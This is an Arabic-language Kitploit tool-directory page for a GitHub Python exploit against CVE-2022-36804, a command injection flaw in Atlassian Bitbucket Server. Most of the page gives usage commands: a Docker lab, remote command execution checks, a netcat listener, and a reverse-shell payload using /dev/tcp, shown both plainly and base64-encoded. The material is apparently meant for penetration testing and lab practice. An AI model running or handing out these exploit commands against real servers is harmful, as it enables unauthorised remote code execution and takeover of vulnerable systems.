Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Atlassian-Bitbucket-CVE-2022-36804 — استغلال Python لثغرة حقن الأوامر CVE-2022-36804 في Atlassian Bitbucket Server، مما يتيح تنفيذ الأوامر عن بُعد وصدفة عكسية مع أوامر قابلة للتخصيص وبيئة مختبر Docker. | Kitploit
أدوات/GitHubGitHub/imbas007/atlassian-bitbucket-cve-2022-36804
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةمختبرات وتدريب عملي
GitHubimbas007/atlassian-bitbucket-cve-2022-36804

Atlassian-Bitbucket-CVE-2022-36804

استغلال Python لثغرة حقن الأوامر CVE-2022-36804 في Atlassian Bitbucket Server، مما يتيح تنفيذ الأوامر عن بُعد وصدفة عكسية مع أوامر قابلة للتخصيص وبيئة مختبر Docker.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
منذ 3 سنواتلم تتم المراجعة بعد

Atlassian-Bitbucket-Server-CVE-2022-36804

تم اكتشاف ثغرة أمنية خطيرة لحقن الأوامر في عدة نقاط نهاية API لخادم Bitbucket من Atlassian ومركز البيانات. تؤثر هذه الثغرة على جميع إصدارات Bitbucket Server و Data Center التي تم إصدارها قبل الإصدارات <7.6.17 و <7.17.10 و <7.21.4 و <8.0.3 و <8.1.2 و <8.2.2 و <8.3.1

مختبر لـ CVE-2022-36804

بناء Docker

root@kitploit:~
docker build -t bitbucket .

تشغيل Docker

root@kitploit:~
docker run -it bitbucket

استخدام cve-2022-36804.py

التحقق من تنفيذ الأوامر عن بُعد (RCE)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990

التحقق من RCE بأمر مخصص (cmd)

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id

التحقق من RCE بأمر مخصص، ومفتاح المشروع، واسم المستودع

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c whoami -p NEW -r newrepo

الحصول على شيل عبر netcat

استبدل 172.17.0.3 بعنوان IP المحلي الخاص بك

root@kitploit:~
python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "sh -i >& /dev/tcp/172.17.0.2/4444 0>&1"

بدء مستمع netcat باستخدام:

root@kitploit:~
nc -lvp 4444

شيل عكسي عبر الإنترنت: https://www.revshells.com

root@kitploit:~
قم بتحويل `sh -i >& /dev/tcp/172.17.0.2/4444 0>&1` إلى base64 في حالة حدوث خطأ في تنفيذ الحمولة.

python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c "echo 'c2ggLWkgPiYgL2Rldi90Y3AvMTcyLjE3LjAuMi80NDQ0IDA+JjE=' | base64 -d | bash"

root@kitploit:~
يوصى بتثبيت إصدار ضعيف من خادم Bitbucket على جهاز Windows/Linux للممارسة. سيكون تحقيق الشيل العكسي أسهل مقارنةً بصور Docker.

يمكن العثور على مزيد من المعلومات [هنا](https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/)

# المراجع
* https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html
* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36804
* https://walnutsecurity.com/cve-2022-36804-rce-in-bitbucket-server/
* https://github.com/walnutsecurity/cve-2022-36804
تنزيل الأداة